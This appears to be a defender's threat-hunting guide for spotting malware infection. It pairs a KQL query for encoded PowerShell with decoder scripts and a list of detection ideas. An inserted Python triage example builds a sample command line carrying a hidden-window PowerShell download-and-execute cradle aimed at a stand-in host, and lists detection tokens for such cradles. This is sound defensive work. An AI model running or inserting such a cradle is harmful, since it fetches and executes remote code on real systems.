Detecting Malware Infection (MITRE ATT&CK: T1566, T1059)
Note: You may sometimes have to customise the queries to your environment, and a query only returns results if the relevant data source is being collected.
Overview:
Malware infection often involves scripts, executables, and payloads designed to compromise systems, execute commands, or maintain persistence. These infections can lead to lateral movement, data theft, or further compromises within the network.
Below are 25 example queries for malware infection detection:

1. Detect Suspicious PowerShell Commands (Encoded Commands): PowerShell-encoded commands often indicate obfuscation used in malware payloads.
DeviceProcessEvents
| where FileName == "powershell.exe" and ProcessCommandLine has "encodedCommand"
| where InitiatingProcessAccountName != "network service" and InitiatingProcessAccountName != "system"
| summarize count() by TimeGenerated, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, ProcessCommandLine

Note: The following is an example of how to decode PowerShell-encoded commands.
Method 1: Decode Using PowerShell
# Example encoded string (paste the Base64 value taken from ProcessCommandLine here)
$EncodedCommand = "enter encoded string"
# Convert from Base64 to bytes
$Bytes = [System.Convert]::FromBase64String($EncodedCommand)
# Convert bytes to string (PowerShell encodes -EncodedCommand payloads as UTF-16 LE)
$DecodedCommand = [System.Text.Encoding]::Unicode.GetString($Bytes)
# Output the decoded command
Write-Output $DecodedCommand

Method 2: Decode Using Python
Here’s how you can decode it using Python:
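As an added Python example (not the page's own listing), the decoder below pulls the Base64 value out of a ProcessCommandLine string, including the abbreviated -e/-ec/-enc forms PowerShell accepts, decodes it as UTF-16LE, and reports which triage tokens appear in the result. The sample command line, the script it carries and the token list are constructed assumptions.

```python
import base64
import binascii
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters> <base64>" and check the prefix afterwards.
_FLAG_RE = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+[\"']?([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Constructed triage tokens (assumption: tune to your own environment).
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring",
                     "net.webclient", "frombase64string")

def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the Base64 payload passed to -EncodedCommand (or an abbreviation), if any."""
    for m in _FLAG_RE.finditer(command_line):
        flag, payload = m.group(1).lower(), m.group(2)
        if "encodedcommand".startswith(flag):
            return payload
    return None

def decode_powershell_command(payload: str) -> Optional[str]:
    """Base64-decode and read as UTF-16LE, the encoding PowerShell uses for -EncodedCommand."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # truncated or corrupted payload: do not crash the triage loop

def encode_powershell_command(script: str) -> str:
    """Inverse of decode_powershell_command; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def triage(command_line: str) -> dict:
    """Decode a ProcessCommandLine value and list the suspicious tokens in the decoded script."""
    payload = extract_encoded_command(command_line)
    decoded = decode_powershell_command(payload) if payload else None
    hits = [t for t in SUSPICIOUS_TOKENS if decoded and t in decoded.lower()]
    return {"encoded": payload is not None, "decoded": decoded, "indicators": hits}

# Constructed sample command line (not real telemetry). It uses the abbreviated "-enc"
# flag, which a literal match on the term "encodedCommand" does not catch.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_COMMAND_LINE = "powershell.exe -nop -w hidden -enc " + encode_powershell_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(triage(SAMPLE_COMMAND_LINE))
```

Note that the KQL operator has matches whole terms, so the query's has "encodedCommand" filter does not return command lines that use -enc or -e; extend the filter to those abbreviations if your telemetry shows them.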
2. Identify Execution of Suspicious EXEs from Temp Directories: Malware often resides in temp directories before execution.
3. Track Use of MSHTA for Malicious Script Execution: MSHTA is frequently abused to execute malicious scripts.
4. Detect Rundll32 Execution of Malicious DLLs: Rundll32 is often used to execute malicious DLLs, a common malware technique.
5. Monitor Execution of Suspicious Scripting Engines: Malicious scripts may be executed via WScript or CScript.
6. Track EXE File Downloads and Execution via CertUtil: CertUtil is often abused to download malware payloads.
7. Identify the Use of LOLBins (Living Off the Land Binaries): Standard system binaries like bitsadmin and msiexec are often used in attacks.
8. Detect Creation of Suspicious Scheduled Tasks: Malware often uses scheduled tasks for persistence.
9. Monitor PowerShell Script Downloads via Invoke-WebRequest: Invoke-WebRequest is used to download malicious scripts from the internet.
10. Track Suspicious Use of Bitsadmin for File Transfers: Bitsadmin is sometimes leveraged to download or upload malicious files.
11. Detect New EXE Files in User Directories: New EXE files appearing in user directories may indicate malware delivery.
12. Monitor Process Spawning from Office Applications: Malicious macros in Office documents may spawn child processes.
13. Detect the Use of Task Scheduler to Maintain Persistence: Scheduled tasks can be created by malware to ensure persistence.
14. Identify Script Execution via CMD (Batch Scripts): CMD can be used to execute batch scripts in malware infections.
15. Track PowerShell Use of Execution Policy Bypass: Malicious PowerShell scripts often bypass execution policies.
16. Detect DLL Side-Loading or Injection: DLL injection or side-loading is used to execute malicious code within trusted processes.
17. Monitor Unusual Use of MSBuild for Malware Execution: MSBuild is sometimes leveraged to execute code or load malware.
18. Detect Use of Hidden Windows for Malware Persistence (explorer.exe): Malware can use hidden windows to hide its execution from the user.
19. Monitor Suspicious Use of CMD for File Deletion: Malware may delete files to cover its tracks using the "del" command.
20. Track Use of Remote Desktop Protocol for Malicious Access: RDP is often used to access compromised systems remotely.
21. Detect PowerShell Execution Using Uncommon Flags: Malicious scripts may use uncommon flags to bypass detection (e.g., -windowstyle hidden).
22. Monitor the Use of VSSAdmin for Shadow Copy Deletion: Malware (such as ransomware) may delete volume shadow copies to prevent recovery.
23. Identify Unusual Network Traffic from Newly Executed Binaries: Malware often communicates with external C2 servers after execution.
24. Detect Execution of Signed Binaries Used by Attackers: Attackers may abuse trusted signed binaries for malicious purposes (e.g., regsvr32, msiexec).
25. Monitor the Use of Certutil for Decoding Malicious Payloads: Certutil can be used to decode Base64-encoded malicious payloads.